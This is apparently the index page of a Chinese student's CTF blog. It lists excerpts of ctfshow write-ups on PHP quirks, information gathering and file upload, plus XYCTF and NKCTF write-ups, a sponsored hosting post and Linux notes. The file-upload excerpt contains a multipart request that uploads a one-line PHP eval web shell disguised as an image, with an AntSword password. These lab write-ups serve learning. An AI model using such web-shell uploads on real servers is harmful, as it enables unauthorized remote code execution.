CH0ico

python SSTI + 反序列化 qwq好困看不进去不知道训练晚上几点结束框架学习ing Re 核心出装：Nop✌+D3v3n✌ [图片]hhhh 今天开始入坑re 似乎也不错~ [图片]在挖掘MCV链的时候,VScode搜索跟进函数时出现情况VSCode有时全局搜索时内容不全（特别是软件所打开的目录下有非常多的文件时，需要手动打开没被搜索的文件，重新搜索才有此文件的结果）------ 其中原因可能是搜索时使用了.gitignore/.ignore文件导致忽略了部分文件的内容,其中原因可能是搜索时使用了.gitignore/.ignore文件导致忽略了部分文件的内容 ------ 可打开VSCode的设置，输入:Use Ignore Files，找到相关选项后取消勾选 [图片]七点多打开b站就给我推送了这个, 坐而论道，不如起而行之. 遂下载试试, 沃趣, 豪用! 这位站长也是很厉害. 要是NewStar有这个,我都不敢想有多强 (doge) [图片]原来图床图片会被审核的吗? 可惜 [图片]新增装备页面 (但是舍弃了puq页面)终于可以回家了qwq 小站崩溃了, 换一个hexo主题

首页

生活

大学

hacker

hacker

未读

ctfshow_php特性

发表于2024-07-202024-08-11 php

web 89123456789if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }} num 不能含有 0-9 , 但是需要是数字传入空数组 ( 被认为是零 ) ?num[]=1 web 901234567891011if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===44 ...

hacker

未读

ctfshow_信息收集

发表于2024-07-202024-07-26 web

web 1查看源码注释部分 web 2禁用右键和 F12, 使用 Ctrl+U 查看源文件(注释部分) web 3BP 抓取返回包或者在’网络’中读取 web 4读取../robots.txt web 5读取../index.phps web 6读取../www.zip web 7.git 泄露 , 访问../.git web 8.svn 泄露 , 访问../.svn web 9swp 临时文件泄露访问 ../index.php.swp (这是 vim 没有正常保存产生的 index.php 的备份文件) web 10在’网络’中读取 cookie 值 web 11查找 flag.ctfshow.com 域名下的 txt 记录域名 txt 记录查询 (这题可能环境坏了直接给了 wp 和 flag 无法真正复现) 也可以用 nslookup 1nslookup -qt=txt flag.ctfshow.com web 12提示说 “有时候网站上的公开信息，就是管理员常用密码” 某些信息: 1Help Line ...

hacker

未读

ctfshow_文件上传

发表于2024-07-202024-08-09 php

web 151 前端检测在 bp 修改文件类型就能绕过前端检测抓包上传 123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: form-data; name="file"; filename="WD.php"Content-Type: image/png<?phpeval($_POST[1]);-----------------------------249623824540300659272997113405--AntSword: ../upload/WD.phpPassword: 1 web 152抓包上传 123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: f ...

大学

未读

DK推广

发表于2024-07-012024-07-26 ad

广告接了 DK 盾的 CTF 激励计划, 推广一下 (确实很好用) 服务器服务器十分之物美价廉啊 DK 盾也是让我白嫖上了 hhh 本站的图片也是使用的 DK 图床, 伟大无需多言 (还抽奖中了一台香港 A 型说是,但是忘了领奖不嘻嘻) QQ 群: 727077055

hacker

未读

XYCTF2024

发表于2024-04-012024-07-26 ctf_wp

ezRCE题目12345678910111213<?phpfunction waf($cmd){ $white_list = ['0','1','2','3','4','5','6','7','8','9','\\','\'','$','<']; $cmd_char = str_split($cmd); foreach($cmd_char as $char){ if (!in_array($char, $white_list)){ die("really ez?"); } } return $cmd;}$cmd=waf($_GET[ ...

hacker

未读

NKCTF

发表于2024-03-282024-07-26 ctf_wp

NKCTF_WP7 题 1400 分 50/1282 队 0x01 签到关注公众号发送口令得到 flag 0x02 流量分析题目-服务器的返回包翻译 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136//1 whoamiroot//2 应该是ifconfig?/bin/sh: 1: ipconfig: not found//3 ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,M ...

大学

未读

Linux操作

发表于2023-08-192024-08-19 Linux

目录0x01 计算机系统结构0x02 安装和配置 CentOS0x03 Linux 基础知识0x04 Linux 文件和目录管理0x05 文件压缩和解压缩0x06 查看和处理文件内容0x07 Linux 文本编辑器0x08 Linux 安装软件0x09 用户和权限管理0x10 Linux 网络管理0x11 系统状态管理 0x01 计算机系统结构1.1 计算机发展历史1.1.1 计算机组成计算机应用程序操作系统、编译原理、计算机网络计算机体系结构 CPU/GPU、内存/硬盘、显示器/键盘 1.1.2 发展历史1）图灵理论计算的本质是一种机械运动，但它需要信息（指令）控制 2）香农《继电器与开关电路的符号分析》将电路开关和布尔代结合起来 3）冯·诺依曼体系结构一般的计算机的组成：控制器，运算器，存储器，输入设备和输出设备 3）发展历程 1946 电子管计算机 1956 晶体管计算机 1964 集成电路计算机 1972 超大规模继承电路计算机 1.2 计算机硬件1.2.1 CPU 中央处理器解释指令处理数据 1 ) 组成控制单元（Cont ...